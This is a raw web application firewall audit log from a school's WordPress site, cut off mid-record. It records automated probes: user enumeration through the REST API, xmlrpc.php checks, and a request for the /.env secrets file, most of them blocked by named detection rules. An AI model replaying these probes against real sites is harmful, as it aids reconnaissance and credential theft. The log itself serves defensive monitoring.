X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.91.124 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --18981652-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --18981652-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459515533779 3217 (- - -) Stopwatch2: 1746459515533779 3217; combined=1437, p1=494, p2=908, p3=0, p4=0, p5=35, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18981652-Z-- --a7b7c726-A-- [05/May/2025:22:38:38 +0700] aBjbfgRwKNFSM6B7_Lab1AAAAIk 103.236.140.4 56502 103.236.140.4 8181 --a7b7c726-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.91.124 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.91.124 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a7b7c726-C-- demo.sayHello --a7b7c726-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7b7c726-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459518264386 6111 (- - -) Stopwatch2: 1746459518264386 6111; combined=4384, p1=522, p2=3624, p3=32, p4=34, p5=100, sr=75, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7b7c726-Z-- --2fd6546f-A-- [05/May/2025:22:38:38 +0700] aBjbfgRwKNFSM6B7_Lab1QAAAJY 103.236.140.4 56508 103.236.140.4 8181 --2fd6546f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.87 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2fd6546f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2fd6546f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459518698862 2433 (- - -) Stopwatch2: 1746459518698862 2433; combined=1339, p1=454, p2=855, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2fd6546f-Z-- --0839be67-A-- [05/May/2025:22:38:42 +0700] aBjbggRwKNFSM6B7_Lab4AAAAIQ 103.236.140.4 56546 103.236.140.4 8181 --0839be67-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.87 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.87 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0839be67-C-- demo.sayHello --0839be67-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0839be67-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459522017405 5684 (- - -) Stopwatch2: 1746459522017405 5684; combined=4363, p1=510, p2=3578, p3=32, p4=36, p5=123, sr=73, sw=84, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0839be67-Z-- --1076ce50-A-- [05/May/2025:22:38:56 +0700] aBjbkPZJDMuQndL03JNWcQAAAEo 103.236.140.4 56682 103.236.140.4 8181 --1076ce50-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.111 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1076ce50-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1076ce50-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459536994193 2568 (- - -) Stopwatch2: 1746459536994193 2568; combined=1426, p1=450, p2=945, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1076ce50-Z-- --e1bdd25a-A-- [05/May/2025:22:38:59 +0700] aBjbk02V_h1VFAgsfgZ30wAAABM 103.236.140.4 56706 103.236.140.4 8181 --e1bdd25a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.197 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.197 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e1bdd25a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1bdd25a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459539119000 2500 (- - -) Stopwatch2: 1746459539119000 2500; combined=1206, p1=419, p2=759, p3=0, p4=0, p5=28, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e1bdd25a-Z-- --d2980020-A-- [05/May/2025:22:38:59 +0700] aBjbk_ZJDMuQndL03JNWcgAAAEk 103.236.140.4 56712 103.236.140.4 8181 --d2980020-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.111 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d2980020-C-- demo.sayHello --d2980020-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d2980020-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459539844566 4990 (- - -) Stopwatch2: 1746459539844566 4990; combined=3928, p1=493, p2=3207, p3=28, p4=30, p5=98, sr=73, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d2980020-Z-- --f16e8438-A-- [05/May/2025:22:39:01 +0700] aBjblYZWvR7-42f6JrAHggAAANE 103.236.140.4 56738 103.236.140.4 8181 --f16e8438-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.197 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.197 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f16e8438-C-- demo.sayHello --f16e8438-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f16e8438-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459541881373 5031 (- - -) Stopwatch2: 1746459541881373 5031; combined=4070, p1=516, p2=3305, p3=37, p4=39, p5=100, sr=65, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f16e8438-Z-- --bd4d4b3b-A-- [05/May/2025:22:39:18 +0700] aBjbpk2V_h1VFAgsfgZ33wAAAAM 103.236.140.4 56850 103.236.140.4 8181 --bd4d4b3b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.75 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bd4d4b3b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bd4d4b3b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459558185239 3457 (- - -) Stopwatch2: 1746459558185239 3457; combined=1461, p1=479, p2=947, p3=0, p4=0, p5=35, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bd4d4b3b-Z-- --440a6b11-A-- [05/May/2025:22:39:20 +0700] aBjbqE2V_h1VFAgsfgZ35AAAABg 103.236.140.4 56866 103.236.140.4 8181 --440a6b11-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.75 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --440a6b11-C-- demo.sayHello --440a6b11-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --440a6b11-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459560925001 5298 (- - -) Stopwatch2: 1746459560925001 5298; combined=4340, p1=506, p2=3596, p3=35, p4=36, p5=98, sr=85, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --440a6b11-Z-- --4ae4a162-A-- [05/May/2025:22:39:24 +0700] aBjbrE2V_h1VFAgsfgZ37QAAAAs 103.236.140.4 56902 103.236.140.4 8181 --4ae4a162-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4ae4a162-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4ae4a162-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459564947938 2702 (- - -) Stopwatch2: 1746459564947938 2702; combined=1234, p1=422, p2=779, p3=0, p4=0, p5=32, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4ae4a162-Z-- --4dac9544-A-- [05/May/2025:22:39:27 +0700] aBjbr4ZWvR7-42f6JrAHiQAAAMU 103.236.140.4 56930 103.236.140.4 8181 --4dac9544-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.80 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4dac9544-C-- demo.sayHello --4dac9544-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4dac9544-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459567825356 5501 (- - -) Stopwatch2: 1746459567825356 5501; combined=4230, p1=501, p2=3503, p3=31, p4=35, p5=94, sr=74, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4dac9544-Z-- --17d6ab44-A-- [05/May/2025:22:39:44 +0700] aBjbwIZWvR7-42f6JrAHogAAAMY 103.236.140.4 57080 103.236.140.4 8181 --17d6ab44-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.144.212.193 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.144.212.193 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --17d6ab44-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --17d6ab44-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746459584677849 798 (- - -) Stopwatch2: 1746459584677849 798; combined=314, p1=273, p2=0, p3=0, p4=0, p5=40, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17d6ab44-Z-- --b5a2dd0c-A-- [05/May/2025:22:39:48 +0700] aBjbxIZWvR7-42f6JrAHpQAAAMQ 103.236.140.4 57114 103.236.140.4 8181 --b5a2dd0c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.148 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.148 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b5a2dd0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5a2dd0c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459588020692 2496 (- - -) Stopwatch2: 1746459588020692 2496; combined=1147, p1=369, p2=751, p3=0, p4=0, p5=27, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5a2dd0c-Z-- --d3c4f701-A-- [05/May/2025:22:39:50 +0700] aBjbxk2V_h1VFAgsfgZ3-QAAAAY 103.236.140.4 57150 103.236.140.4 8181 --d3c4f701-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.148 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.148 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d3c4f701-C-- demo.sayHello --d3c4f701-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3c4f701-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459590815473 5791 (- - -) Stopwatch2: 1746459590815473 5791; combined=4670, p1=571, p2=3861, p3=40, p4=44, p5=92, sr=74, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3c4f701-Z-- --d67f7415-A-- [05/May/2025:22:40:31 +0700] aBjb702V_h1VFAgsfgZ4DgAAABU 103.236.140.4 57500 103.236.140.4 8181 --d67f7415-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.59.22 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.59.22 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d67f7415-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d67f7415-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459631949404 2501 (- - -) Stopwatch2: 1746459631949404 2501; combined=1283, p1=438, p2=817, p3=0, p4=0, p5=28, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d67f7415-Z-- --e4368215-A-- [05/May/2025:22:40:33 +0700] aBjb8fZJDMuQndL03JNWvwAAAFI 103.236.140.4 57524 103.236.140.4 8181 --e4368215-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.125.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.125.229 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e4368215-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e4368215-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459633781755 2414 (- - -) Stopwatch2: 1746459633781755 2414; combined=1131, p1=379, p2=723, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4368215-Z-- --870f372c-A-- [05/May/2025:22:40:34 +0700] aBjb8vZJDMuQndL03JNWwgAAAFE 103.236.140.4 57534 103.236.140.4 8181 --870f372c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.59.22 X-Forwarded-Host: 